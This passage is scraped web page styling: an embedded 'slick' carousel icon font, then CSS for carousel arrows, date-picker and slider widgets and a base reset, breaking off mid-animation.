aQBjAGsAAHNsaWNrAABWAGUAcgBzAGkAbwBuACAAMQAuADAAAFZlcnNpb24gMS4wAABzAGwAaQBjAGsAAHNsaWNrAAAAAAIAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAABwAAAAEAAgECAQMAhwBECmFycm93cmlnaHQJYXJyb3dsZWZ0AAAAAAAAAf//AAIAAQAAAA4AAAAYAAAAAAACAAEAAwAGAAEABAAAAAIAAAAAAAEAAAAAzu7XsAAAAADPcXh/AAAAAM9xeH8=) format('truetype'), url("data:image/svg+xml,%3C?xml version='1.0' standalone='no'?%3E %3C!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN' 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'%3E %3Csvg xmlns='http://www.w3.org/2000/svg'%3E %3Cmetadata%3EGenerated by Fontastic.me%3C/metadata%3E %3Cdefs%3E %3Cfont id='slick' horiz-adv-x='512'%3E %3Cfont-face font-family='slick' units-per-em='512' ascent='480' descent='-32'/%3E %3Cmissing-glyph horiz-adv-x='512' /%3E %3Cglyph unicode='&%238594;' d='M241 113l130 130c4 4 6 8 6 13 0 5-2 9-6 13l-130 130c-3 3-7 5-12 5-5 0-10-2-13-5l-29-30c-4-3-6-7-6-12 0-5 2-10 6-13l87-88-87-88c-4-3-6-8-6-13 0-5 2-9 6-12l29-30c3-3 8-5 13-5 5 0 9 2 12 5z m234 143c0-40-9-77-29-110-20-34-46-60-80-80-33-20-70-29-110-29-40 0-77 9-110 29-34 20-60 46-80 80-20 33-29 70-29 110 0 40 9 77 29 110 20 34 46 60 80 80 33 20 70 29 110 29 40 0 77-9 110-29 34-20 60-46 80-80 20-33 29-70 29-110z'/%3E %3Cglyph unicode='&%238592;' d='M296 113l29 30c4 3 6 7 6 12 0 5-2 10-6 13l-87 88 87 88c4 3 6 8 6 13 0 5-2 9-6 12l-29 30c-3 3-8 5-13 5-5 0-9-2-12-5l-130-130c-4-4-6-8-6-13 0-5 2-9 6-13l130-130c3-3 7-5 12-5 5 0 10 2 13 5z m179 143c0-40-9-77-29-110-20-34-46-60-80-80-33-20-70-29-110-29-40 0-77 9-110 29-34 20-60 46-80 80-20 33-29 70-29 110 0 40 9 77 29 110 20 34 46 60 80 80 33 20 70 29 110 29 40 0 77-9 110-29 34-20 60-46 80-80 20-33 29-70 29-110z'/%3E %3Cglyph unicode='&%238226;' d='M475 256c0-40-9-77-29-110-20-34-46-60-80-80-33-20-70-29-110-29-40 0-77 9-110 29-34 20-60 46-80 80-20 33-29 70-29 110 0 40 9 77 29 110 20 34 46 60 80 80 33 20 70 29 110 29 40 0 77-9 110-29 34-20 60-46 80-80 20-33 29-70 29-110z'/%3E %3Cglyph unicode='&%2397;' d='M475 439l0-128c0-5-1-9-5-13-4-4-8-5-13-5l-128 0c-8 0-13 3-17 11-3 7-2 14 4 20l40 39c-28 26-62 39-100 39-20 0-39-4-57-11-18-8-33-18-46-32-14-13-24-28-32-46-7-18-11-37-11-57 0-20 4-39 11-57 8-18 18-33 32-46 13-14 28-24 46-32 18-7 37-11 57-11 23 0 44 5 64 15 20 9 38 23 51 42 2 1 4 3 7 3 3 0 5-1 7-3l39-39c2-2 3-3 3-6 0-2-1-4-2-6-21-25-46-45-76-59-29-14-60-20-93-20-30 0-58 5-85 17-27 12-51 27-70 47-20 19-35 43-47 70-12 27-17 55-17 85 0 30 5 58 17 85 12 27 27 51 47 70 19 20 43 35 70 47 27 12 55 17 85 17 28 0 55-5 81-15 26-11 50-26 70-45l37 37c6 6 12 7 20 4 8-4 11-9 11-17z'/%3E %3C/font%3E%3C/defs%3E%3C/svg%3E#slick") format('svg'); } /* Arrows */ .slick-prev, .slick-next { font-size: 0; line-height: 0; position: absolute; top: 50%; display: block; width: 20px; height: 20px; padding: 0; -webkit-transform: translate(0, -50%); -ms-transform: translate(0, -50%); transform: translate(0, -50%); cursor: pointer; color: transparent; border: none; outline: none; background: transparent; } .slick-prev:hover, .slick-prev:focus, .slick-next:hover, .slick-next:focus { color: transparent; outline: none; background: transparent; } .slick-prev:hover:before, .slick-prev:focus:before, .slick-next:hover:before, .slick-next:focus:before { opacity: 1; } .slick-prev.slick-disabled:before, .slick-next.slick-disabled:before { opacity: .25; } .slick-prev:before, .slick-next:before { font-family: 'slick'; font-size: 20px; line-height: 1; opacity: .75; color: white; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .slick-prev { left: -25px; } [dir='rtl'] .slick-prev { right: -25px; left: auto; } .slick-prev:before { content: '←'; } [dir='rtl'] .slick-prev:before { content: '→'; } .slick-next { right: -25px; } [dir='rtl'] .slick-next { right: auto; left: -25px; } .slick-next:before { content: '→'; } [dir='rtl'] .slick-next:before { content: '←'; } /* Dots */ .slick-dotted.slick-slider { margin-bottom: 30px; } .slick-dots { position: absolute; bottom: -25px; display: block; width: 100%; padding: 0; margin: 0; list-style: none; text-align: center; } .slick-dots li { position: relative; display: inline-block; width: 20px; height: 20px; margin: 0 5px; padding: 0; cursor: pointer; } .slick-dots li button { font-size: 0; line-height: 0; display: block; width: 20px; height: 20px; padding: 5px; cursor: pointer; color: transparent; border: 0; outline: none; background: transparent; } .slick-dots li button:hover, .slick-dots li button:focus { outline: none; } .slick-dots li button:hover:before, .slick-dots li button:focus:before { opacity: 1; } .slick-dots li button:before { font-family: 'slick'; font-size: 6px; line-height: 20px; position: absolute; top: 0; left: 0; width: 20px; height: 20px; content: '•'; text-align: center; opacity: .25; color: black; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .slick-dots li.slick-active button:before { opacity: .75; color: black; } </style><style type="text/css">.PresetDateRangePicker_panel { padding: 0 22px 11px } .PresetDateRangePicker_button { position: relative; height: 100%; text-align: center; background: 0 0; border: 2px solid #00a699; color: #00a699; padding: 4px 12px; margin-right: 8px; font: inherit; font-weight: 700; line-height: normal; overflow: visible; -moz-box-sizing: border-box; box-sizing: border-box; cursor: pointer } .PresetDateRangePicker_button:active { outline: 0 } .PresetDateRangePicker_button__selected { color: #fff; background: #00a699 } .SingleDatePickerInput { display: inline-block; background-color: #fff } .SingleDatePickerInput__withBorder { border-radius: 2px; border: 1px solid #dbdbdb } .SingleDatePickerInput__rtl { direction: rtl } .SingleDatePickerInput__disabled { background-color: #f2f2f2 } .SingleDatePickerInput__block { display: block } .SingleDatePickerInput__showClearDate { padding-right: 30px } .SingleDatePickerInput_clearDate { background: 0 0; border: 0; color: inherit; font: inherit; line-height: normal; overflow: visible; cursor: pointer; padding: 10px; margin: 0 10px 0 5px; position: absolute; right: 0; top: 50%; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%) } .SingleDatePickerInput_clearDate__default:focus, .SingleDatePickerInput_clearDate__default:hover { background: #dbdbdb; border-radius: 50% } .SingleDatePickerInput_clearDate__small { padding: 6px } .SingleDatePickerInput_clearDate__hide { visibility: hidden } .SingleDatePickerInput_clearDate_svg { fill: #82888a; height: 12px; width: 15px; vertical-align: middle } .SingleDatePickerInput_clearDate_svg__small { height: 9px } .SingleDatePickerInput_calendarIcon { background: 0 0; border: 0; color: inherit; font: inherit; line-height: normal; overflow: visible; cursor: pointer; display: inline-block; vertical-align: middle; padding: 10px; margin: 0 5px 0 10px } .SingleDatePickerInput_calendarIcon_svg { fill: #82888a; height: 15px; width: 14px; vertical-align: middle } .SingleDatePicker { position: relative; display: inline-block } .SingleDatePicker__block { display: block } .SingleDatePicker_picker { z-index: 1; background-color: #fff; position: absolute } .SingleDatePicker_picker__rtl { direction: rtl } .SingleDatePicker_picker__directionLeft { left: 0 } .SingleDatePicker_picker__directionRight { right: 0 } .SingleDatePicker_picker__portal { background-color: rgba(0,0,0,.3); position: fixed; top: 0; left: 0; height: 100%; width: 100% } .SingleDatePicker_picker__fullScreenPortal { background-color: #fff } .SingleDatePicker_closeButton { background: 0 0; border: 0; color: inherit; font: inherit; line-height: normal; overflow: visible; cursor: pointer; position: absolute; top: 0; right: 0; padding: 15px; z-index: 2 } .SingleDatePicker_closeButton:focus, .SingleDatePicker_closeButton:hover { color: darken(#cacccd,10%); text-decoration: none } .SingleDatePicker_closeButton_svg { height: 15px; width: 15px; fill: #cacccd } .DayPickerKeyboardShortcuts_buttonReset { background: 0 0; border: 0; border-radius: 0; color: inherit; font: inherit; line-height: normal; overflow: visible; padding: 0; cursor: pointer; font-size: 14px } .DayPickerKeyboardShortcuts_buttonReset:active { outline: 0 } .DayPickerKeyboardShortcuts_show { width: 33px; height: 26px; position: absolute; z-index: 2 } .DayPickerKeyboardShortcuts_show::before { content: ""; display: block; position: absolute } .DayPickerKeyboardShortcuts_show__bottomRight { bottom: 0; right: 0 } .DayPickerKeyboardShortcuts_show__bottomRight::before { border-top: 26px solid transparent; border-right: 33px solid #00a699; bottom: 0; right: 0 } .DayPickerKeyboardShortcuts_show__bottomRight:hover::before { border-right: 33px solid #008489 } .DayPickerKeyboardShortcuts_show__topRight { top: 0; right: 0 } .DayPickerKeyboardShortcuts_show__topRight::before { border-bottom: 26px solid transparent; border-right: 33px solid #00a699; top: 0; right: 0 } .DayPickerKeyboardShortcuts_show__topRight:hover::before { border-right: 33px solid #008489 } .DayPickerKeyboardShortcuts_show__topLeft { top: 0; left: 0 } .DayPickerKeyboardShortcuts_show__topLeft::before { border-bottom: 26px solid transparent; border-left: 33px solid #00a699; top: 0; left: 0 } .DayPickerKeyboardShortcuts_show__topLeft:hover::before { border-left: 33px solid #008489 } .DayPickerKeyboardShortcuts_showSpan { color: #fff; position: absolute } .DayPickerKeyboardShortcuts_showSpan__bottomRight { bottom: 0; right: 5px } .DayPickerKeyboardShortcuts_showSpan__topRight { top: 1px; right: 5px } .DayPickerKeyboardShortcuts_showSpan__topLeft { top: 1px; left: 5px } .DayPickerKeyboardShortcuts_panel { overflow: auto; background: #fff; border: 1px solid #dbdbdb; border-radius: 2px; position: absolute; top: 0; bottom: 0; right: 0; left: 0; z-index: 2; padding: 22px; margin: 33px; text-align: left } .DayPickerKeyboardShortcuts_title { font-size: 16px; font-weight: 700; margin: 0 } .DayPickerKeyboardShortcuts_list { list-style: none; padding: 0; font-size: 14px } .DayPickerKeyboardShortcuts_close { position: absolute; right: 22px; top: 22px; z-index: 2 } .DayPickerKeyboardShortcuts_close:active { outline: 0 } .DayPickerKeyboardShortcuts_closeSvg { height: 15px; width: 15px; fill: #cacccd } .DayPickerKeyboardShortcuts_closeSvg:focus, .DayPickerKeyboardShortcuts_closeSvg:hover { fill: #82888a } .CalendarDay { -moz-box-sizing: border-box; box-sizing: border-box; cursor: pointer; font-size: 14px; text-align: center } .CalendarDay:active { outline: 0 } .CalendarDay__defaultCursor { cursor: default } .CalendarDay__default { border: 1px solid #e4e7e7; color: #484848; background: #fff } .CalendarDay__default:hover { background: #e4e7e7; border: 1px solid #e4e7e7; color: inherit } .CalendarDay__hovered_offset { background: #f4f5f5; border: 1px double #e4e7e7; color: inherit } .CalendarDay__outside { border: 0; background: #fff; color: #484848 } .CalendarDay__outside:hover { border: 0 } .CalendarDay__blocked_minimum_nights { background: #fff; border: 1px solid #eceeee; color: #cacccd } .CalendarDay__blocked_minimum_nights:active, .CalendarDay__blocked_minimum_nights:hover { background: #fff; color: #cacccd } .CalendarDay__highlighted_calendar { background: #ffe8bc; color: #484848 } .CalendarDay__highlighted_calendar:active, .CalendarDay__highlighted_calendar:hover { background: #ffce71; color: #484848 } .CalendarDay__selected_span { background: #66e2da; border: 1px double #33dacd; color: #fff } .CalendarDay__selected_span:active, .CalendarDay__selected_span:hover { background: #33dacd; border: 1px double #33dacd; color: #fff } .CalendarDay__selected, .CalendarDay__selected:active, .CalendarDay__selected:hover { background: #00a699; border: 1px double #00a699; color: #fff } .CalendarDay__hovered_span, .CalendarDay__hovered_span:hover { background: #b2f1ec; border: 1px double #80e8e0; color: #007a87 } .CalendarDay__hovered_span:active { background: #80e8e0; border: 1px double #80e8e0; color: #007a87 } .CalendarDay__blocked_calendar, .CalendarDay__blocked_calendar:active, .CalendarDay__blocked_calendar:hover { background: #cacccd; border: 1px solid #cacccd; color: #82888a } .CalendarDay__blocked_out_of_range, .CalendarDay__blocked_out_of_range:active, .CalendarDay__blocked_out_of_range:hover { background: #fff; border: 1px solid #e4e7e7; color: #cacccd } .CalendarDay__hovered_start_first_possible_end { background: #eceeee; border: 1px double #eceeee } .CalendarDay__hovered_start_blocked_min_nights { background: #eceeee; border: 1px double #e4e7e7 } .CalendarMonth { background: #fff; text-align: center; vertical-align: top; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none } .CalendarMonth_table { border-collapse: collapse; border-spacing: 0 } .CalendarMonth_verticalSpacing { border-collapse: separate } .CalendarMonth_caption { color: #484848; font-size: 18px; text-align: center; padding-top: 22px; padding-bottom: 37px; caption-side: initial } .CalendarMonth_caption__verticalScrollable { padding-top: 12px; padding-bottom: 7px } .CalendarMonthGrid { background: #fff; text-align: left; z-index: 0 } .CalendarMonthGrid__animating { z-index: 1 } .CalendarMonthGrid__horizontal { position: absolute; left: 9px } .CalendarMonthGrid__vertical, .CalendarMonthGrid__vertical_scrollable { margin: 0 auto } .CalendarMonthGrid_month__horizontal { display: inline-block; vertical-align: top; min-height: 100% } .CalendarMonthGrid_month__hideForAnimation { position: absolute; z-index: -1; opacity: 0; pointer-events: none } .CalendarMonthGrid_month__hidden { visibility: hidden } .DayPickerNavigation { position: relative; z-index: 2 } .DayPickerNavigation__horizontal { height: 0 } .DayPickerNavigation__verticalScrollable_prevNav { z-index: 1 } .DayPickerNavigation__verticalDefault { position: absolute; width: 100%; height: 52px; bottom: 0; left: 0 } .DayPickerNavigation__verticalScrollableDefault { position: relative } .DayPickerNavigation__bottom { height: auto } .DayPickerNavigation__bottomDefault { -webkit-box-pack: justify; -ms-flex-pack: justify; display: -webkit-box; display: -moz-box; display: -ms-flexbox; display: -webkit-flex; display: flex; -webkit-justify-content: space-between; justify-content: space-between } .DayPickerNavigation_button { cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; border: 0; padding: 0; margin: 0 } .DayPickerNavigation_button__default { border: 1px solid #e4e7e7; background-color: #fff; color: #757575 } .DayPickerNavigation_button__default:focus, .DayPickerNavigation_button__default:hover { border: 1px solid #c4c4c4 } .DayPickerNavigation_button__default:active { background: #f2f2f2 } .DayPickerNavigation_button__disabled { cursor: default; border: 1px solid #f2f2f2 } .DayPickerNavigation_button__disabled:focus, .DayPickerNavigation_button__disabled:hover { border: 1px solid #f2f2f2 } .DayPickerNavigation_button__disabled:active { background: 0 0 } .DayPickerNavigation_button__horizontalDefault { position: absolute; top: 18px; line-height: .78; border-radius: 3px; padding: 6px 9px } .DayPickerNavigation_bottomButton__horizontalDefault { position: static; margin: -10px 22px 30px } .DayPickerNavigation_leftButton__horizontalDefault { left: 22px } .DayPickerNavigation_rightButton__horizontalDefault { right: 22px } .DayPickerNavigation_button__verticalDefault { padding: 5px; background: #fff; box-shadow: 0 0 5px 2px rgba(0,0,0,.1); position: relative; display: inline-block; text-align: center; height: 100%; width: 50% } .DayPickerNavigation_nextButton__verticalDefault { border-left: 0 } .DayPickerNavigation_nextButton__verticalScrollableDefault, .DayPickerNavigation_prevButton__verticalScrollableDefault { width: 100% } .DayPickerNavigation_svg__horizontal { height: 19px; width: 19px; fill: #82888a; display: block } .DayPickerNavigation_svg__vertical { height: 42px; width: 42px; fill: #484848 } .DayPickerNavigation_svg__disabled { fill: #f2f2f2 } .DayPicker { background: #fff; position: relative; text-align: left } .DayPicker__horizontal { background: #fff } .DayPicker__verticalScrollable { height: 100% } .DayPicker__hidden { visibility: hidden } .DayPicker__withBorder { box-shadow: 0 2px 6px rgba(0,0,0,.05),0 0 0 1px rgba(0,0,0,.07); border-radius: 3px } .DayPicker_portal__horizontal { box-shadow: none; position: absolute; left: 50%; top: 50% } .DayPicker_portal__vertical { position: initial } .DayPicker_focusRegion { outline: 0 } .DayPicker_calendarInfo__horizontal, .DayPicker_wrapper__horizontal { display: inline-block; vertical-align: top } .DayPicker_weekHeaders { position: relative } .DayPicker_weekHeaders__horizontal { margin-left: 9px } .DayPicker_weekHeader { color: #757575; position: absolute; top: 62px; z-index: 2; text-align: left } .DayPicker_weekHeader__vertical { left: 50% } .DayPicker_weekHeader__verticalScrollable { top: 0; display: table-row; border-bottom: 1px solid #dbdbdb; background: #fff; margin-left: 0; left: 0; width: 100%; text-align: center } .DayPicker_weekHeader_ul { list-style: none; margin: 1px 0; padding-left: 0; padding-right: 0; font-size: 14px } .DayPicker_weekHeader_li { display: inline-block; text-align: center } .DayPicker_transitionContainer { position: relative; overflow: hidden; border-radius: 3px } .DayPicker_transitionContainer__horizontal { -webkit-transition: height .2s ease-in-out; -moz-transition: height .2s ease-in-out; transition: height .2s ease-in-out } .DayPicker_transitionContainer__vertical { width: 100% } .DayPicker_transitionContainer__verticalScrollable { padding-top: 20px; height: 100%; position: absolute; top: 0; bottom: 0; right: 0; left: 0; overflow-y: scroll } .DateInput { margin: 0; padding: 0; background: #fff; position: relative; display: inline-block; width: 130px; vertical-align: middle } .DateInput__small { width: 97px } .DateInput__block { width: 100% } .DateInput__disabled { background: #f2f2f2; color: #dbdbdb } .DateInput_input { font-weight: 200; font-size: 19px; line-height: 24px; color: #484848; background-color: #fff; width: 100%; padding: 11px 11px 9px; border: 0; border-top: 0; border-right: 0; border-bottom: 2px solid transparent; border-left: 0; border-radius: 0 } .DateInput_input__small { font-size: 15px; line-height: 18px; letter-spacing: .2px; padding: 7px 7px 5px } .DateInput_input__regular { font-weight: auto } .DateInput_input__readOnly { -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none } .DateInput_input__focused { outline: 0; background: #fff; border: 0; border-top: 0; border-right: 0; border-bottom: 2px solid #008489; border-left: 0 } .DateInput_input__disabled { background: #f2f2f2; font-style: italic } .DateInput_screenReaderMessage { border: 0; clip: rect(0,0,0,0); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px } .DateInput_fang { position: absolute; width: 20px; height: 10px; left: 22px; z-index: 2 } .DateInput_fangShape { fill: #fff } .DateInput_fangStroke { stroke: #dbdbdb; fill: transparent } .DateRangePickerInput { background-color: #fff; display: inline-block } .DateRangePickerInput__disabled { background: #f2f2f2 } .DateRangePickerInput__withBorder { border-radius: 2px; border: 1px solid #dbdbdb } .DateRangePickerInput__rtl { direction: rtl } .DateRangePickerInput__block { display: block } .DateRangePickerInput__showClearDates { padding-right: 30px } .DateRangePickerInput_arrow { display: inline-block; vertical-align: middle; color: #484848 } .DateRangePickerInput_arrow_svg { vertical-align: middle; fill: #484848; height: 24px; width: 24px } .DateRangePickerInput_clearDates { background: 0 0; border: 0; color: inherit; font: inherit; line-height: normal; overflow: visible; cursor: pointer; padding: 10px; margin: 0 10px 0 5px; position: absolute; right: 0; top: 50%; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%) } .DateRangePickerInput_clearDates__small { padding: 6px } .DateRangePickerInput_clearDates_default:focus, .DateRangePickerInput_clearDates_default:hover { background: #dbdbdb; border-radius: 50% } .DateRangePickerInput_clearDates__hide { visibility: hidden } .DateRangePickerInput_clearDates_svg { fill: #82888a; height: 12px; width: 15px; vertical-align: middle } .DateRangePickerInput_clearDates_svg__small { height: 9px } .DateRangePickerInput_calendarIcon { background: 0 0; border: 0; color: inherit; font: inherit; line-height: normal; overflow: visible; cursor: pointer; display: inline-block; vertical-align: middle; padding: 10px; margin: 0 5px 0 10px } .DateRangePickerInput_calendarIcon_svg { fill: #82888a; height: 15px; width: 14px; vertical-align: middle } .DateRangePicker { position: relative; display: inline-block } .DateRangePicker__block { display: block } .DateRangePicker_picker { z-index: 1; background-color: #fff; position: absolute } .DateRangePicker_picker__rtl { direction: rtl } .DateRangePicker_picker__directionLeft { left: 0 } .DateRangePicker_picker__directionRight { right: 0 } .DateRangePicker_picker__portal { background-color: rgba(0,0,0,.3); position: fixed; top: 0; left: 0; height: 100%; width: 100% } .DateRangePicker_picker__fullScreenPortal { background-color: #fff } .DateRangePicker_closeButton { background: 0 0; border: 0; color: inherit; font: inherit; line-height: normal; overflow: visible; cursor: pointer; position: absolute; top: 0; right: 0; padding: 15px; z-index: 2 } .DateRangePicker_closeButton:focus, .DateRangePicker_closeButton:hover { color: darken(#cacccd,10%); text-decoration: none } .DateRangePicker_closeButton_svg { height: 15px; width: 15px; fill: #cacccd }</style><style type="text/css">.rc-slider { position: relative; height: 14px; padding: 5px 0; width: 100%; border-radius: 6px; touch-action: none; box-sizing: border-box; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } .rc-slider * { box-sizing: border-box; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } .rc-slider-rail { position: absolute; width: 100%; background-color: #e9e9e9; height: 4px; border-radius: 6px; } .rc-slider-track { position: absolute; left: 0; height: 4px; border-radius: 6px; background-color: #abe2fb; } .rc-slider-handle { position: absolute; width: 14px; height: 14px; cursor: pointer; cursor: -webkit-grab; margin-top: -5px; cursor: grab; border-radius: 50%; border: solid 2px #96dbfa; background-color: #fff; touch-action: pan-x; } .rc-slider-handle-dragging.rc-slider-handle-dragging.rc-slider-handle-dragging { border-color: #57c5f7; box-shadow: 0 0 0 5px #96dbfa; } .rc-slider-handle:focus { outline: none; } .rc-slider-handle-click-focused:focus { border-color: #96dbfa; box-shadow: unset; } .rc-slider-handle:hover { border-color: #57c5f7; } .rc-slider-handle:active { border-color: #57c5f7; box-shadow: 0 0 5px #57c5f7; cursor: -webkit-grabbing; cursor: grabbing; } .rc-slider-mark { position: absolute; top: 18px; left: 0; width: 100%; font-size: 12px; } .rc-slider-mark-text { position: absolute; display: inline-block; vertical-align: middle; text-align: center; cursor: pointer; color: #999; } .rc-slider-mark-text-active { color: #666; } .rc-slider-step { position: absolute; width: 100%; height: 4px; background: transparent; } .rc-slider-dot { position: absolute; bottom: -2px; margin-left: -4px; width: 8px; height: 8px; border: 2px solid #e9e9e9; background-color: #fff; cursor: pointer; border-radius: 50%; vertical-align: middle; } .rc-slider-dot-active { border-color: #96dbfa; } .rc-slider-dot-reverse { margin-right: -4px; } .rc-slider-disabled { background-color: #e9e9e9; } .rc-slider-disabled .rc-slider-track { background-color: #ccc; } .rc-slider-disabled .rc-slider-handle, .rc-slider-disabled .rc-slider-dot { border-color: #ccc; box-shadow: none; background-color: #fff; cursor: not-allowed; } .rc-slider-disabled .rc-slider-mark-text, .rc-slider-disabled .rc-slider-dot { cursor: not-allowed !important; } .rc-slider-vertical { width: 14px; height: 100%; padding: 0 5px; } .rc-slider-vertical .rc-slider-rail { height: 100%; width: 4px; } .rc-slider-vertical .rc-slider-track { left: 5px; bottom: 0; width: 4px; } .rc-slider-vertical .rc-slider-handle { margin-left: -5px; touch-action: pan-y; } .rc-slider-vertical .rc-slider-mark { top: 0; left: 18px; height: 100%; } .rc-slider-vertical .rc-slider-step { height: 100%; width: 4px; } .rc-slider-vertical .rc-slider-dot { left: 2px; margin-bottom: -4px; } .rc-slider-vertical .rc-slider-dot:first-child { margin-bottom: -4px; } .rc-slider-vertical .rc-slider-dot:last-child { margin-bottom: -4px; } .rc-slider-tooltip-zoom-down-enter, .rc-slider-tooltip-zoom-down-appear { animation-duration: 0.3s; animation-fill-mode: both; display: block !important; animation-play-state: paused; } .rc-slider-tooltip-zoom-down-leave { animation-duration: 0.3s; animation-fill-mode: both; display: block !important; animation-play-state: paused; } .rc-slider-tooltip-zoom-down-enter.rc-slider-tooltip-zoom-down-enter-active, .rc-slider-tooltip-zoom-down-appear.rc-slider-tooltip-zoom-down-appear-active { animation-name: rcSliderTooltipZoomDownIn; animation-play-state: running; } .rc-slider-tooltip-zoom-down-leave.rc-slider-tooltip-zoom-down-leave-active { animation-name: rcSliderTooltipZoomDownOut; animation-play-state: running; } .rc-slider-tooltip-zoom-down-enter, .rc-slider-tooltip-zoom-down-appear { transform: scale(0, 0); animation-timing-function: cubic-bezier(0.23, 1, 0.32, 1); } .rc-slider-tooltip-zoom-down-leave { animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06); } @keyframes rcSliderTooltipZoomDownIn { 0% { opacity: 0; transform-origin: 50% 100%; transform: scale(0, 0); } 100% { transform-origin: 50% 100%; transform: scale(1, 1); } } @keyframes rcSliderTooltipZoomDownOut { 0% { transform-origin: 50% 100%; transform: scale(1, 1); } 100% { opacity: 0; transform-origin: 50% 100%; transform: scale(0, 0); } } .rc-slider-tooltip { position: absolute; left: -9999px; top: -9999px; visibility: visible; box-sizing: border-box; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } .rc-slider-tooltip * { box-sizing: border-box; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } .rc-slider-tooltip-hidden { display: none; } .rc-slider-tooltip-placement-top { padding: 4px 0 8px 0; } .rc-slider-tooltip-inner { padding: 6px 2px; min-width: 24px; height: 24px; font-size: 12px; line-height: 1; color: #fff; text-align: center; text-decoration: none; background-color: #6c6c6c; border-radius: 6px; box-shadow: 0 0 4px #d9d9d9; } .rc-slider-tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } .rc-slider-tooltip-placement-top .rc-slider-tooltip-arrow { bottom: 4px; left: 50%; margin-left: -4px; border-width: 4px 4px 0; border-top-color: #6c6c6c; } </style><style type="text/css">*,*::before,*::after{box-sizing:border-box}html{font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}@-ms-viewport{width:device-width}article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}body{margin:0}[tabindex='-1']:focus{outline:none !important}hr{box-sizing:content-box;height:0;overflow:visible}h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:0.5em;font-weight:500}p{margin-top:0;margin-bottom:1em}abbr[title],abbr[data-original-title]{text-decoration:underline;text-decoration:underline dotted;border-bottom:0;cursor:help}address{margin-bottom:1em;font-style:normal;line-height:inherit}input::-ms-clear,input::-ms-reveal{display:none}input[type='text'],input[type='password'],input[type='number'],textarea{-webkit-appearance:none}ol,ul,dl{margin-top:0;margin-bottom:1em}ol ol,ul ul,ol ul,ul ol{margin-bottom:0}dt{font-weight:500}dd{margin-bottom:0.5em;margin-left:0}blockquote{margin:0 0 1em}dfn{font-style:italic}b,strong{font-weight:bolder}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}a{text-decoration:none;background-color:transparent;outline:none;cursor:pointer;transition:color 0.3s;-webkit-text-decoration-skip:objects}pre,code,kbd,samp{font-size:1em}pre{margin-top:0;margin-bottom:1em;overflow:auto}figure{margin:0 0 1em}img{vertical-align:middle;border-style:none}svg:not(:root){overflow:hidden}a,area,button,[role='button'],input:not([type='range']),label,select,summary,textarea{touch-action:manipulation}table{border-collapse:collapse}caption{padding-top:0.75em;padding-bottom:0.3em;text-align:left;caption-side:bottom}th{text-align:inherit}input,button,select,optgroup,textarea{margin:0;color:inherit;font-size:inherit;font-family:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}button,html [type="button"],[type="reset"],[type="submit"]{-webkit-appearance:button}button::-moz-focus-inner,[type='button']::-moz-focus-inner,[type='reset']::-moz-focus-inner,[type='submit']::-moz-focus-inner{padding:0;border-style:none}input[type='radio'],input[type='checkbox']{box-sizing:border-box;padding:0}input[type='date'],input[type='time'],input[type='datetime-local'],input[type='month']{-webkit-appearance:listbox}textarea{overflow:auto;resize:vertical}fieldset{min-width:0;margin:0;padding:0;border:0}legend{display:block;width:100%;max-width:100%;margin-bottom:0.5em;padding:0;color:inherit;font-size:1.5em;line-height:inherit;white-space:normal}progress{vertical-align:baseline}[type='number']::-webkit-inner-spin-button,[type='number']::-webkit-outer-spin-button{height:auto}[type='search']{outline-offset:-2px;-webkit-appearance:none}[type='search']::-webkit-search-cancel-button,[type='search']::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}output{display:inline-block}summary{display:list-item}template{display:none}[hidden]{display:none !important}mark{padding:0.2em}@-webkit-keyframes ring{0%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}1%{-webkit-transform:rotate(30deg);-ms-transform:rotate(30deg);transform:rotate(30deg)}3%{-webkit-transform:rotate(-28deg);-ms-transform:rotate(-28deg);transform:rotate(-28deg)}5%{-webkit-transform:rotate(34deg);-ms-transform:rotate(34deg);transform:rotate(34deg)}7%{-webkit-transform:rotate(-32deg);-ms-transform:rotate(-32deg);transform:rotate(-32deg)}9%{-webkit-transform:rotate(30deg);-ms-transform:rotate(30deg);transform:rotate(30deg)}11%{-webkit-transform:rotate(-28deg);-ms-transform:rotate(-28deg);transform:rotate(-28deg)}13%{-webkit-transform:rotate(26deg);-ms-transform:rotate(26deg);transform:rotate(26deg)}15%{-webkit-transform:rotate(-24deg);-ms-transform:rotate(-24deg);transform:rotate(-24deg)}17%{-webkit-transform:rotate(22deg);-ms-transform:rotate(22deg);transform:rotate(22deg)}19%{-webkit-transform:rotate(-20deg);-ms-transform:rotate(-20deg);transform:rotate(-20deg)}21%{-webkit-transform:rotate(18deg);-ms-transform:rotate(18deg);transform:rotate(18deg)}23%{-webkit-transform:rotate(-16deg);-ms-transform:rotate(-16deg);transform:rotate(-16deg)}25%{-webkit-transform:rotate(14deg);-ms-transform:rotate(14deg);transform:rotate(14deg)}27%{-webkit-transform:rotate(-12deg);-ms-transform:rotate(-12deg);transform:rotate(-12deg)}29%{-webkit-transform:rotate(10deg);-ms-transform:rotate(10deg);transform:rotate(10deg)}31%{-webkit-transform:rotate(-8deg);-ms-transform:rotate(-8de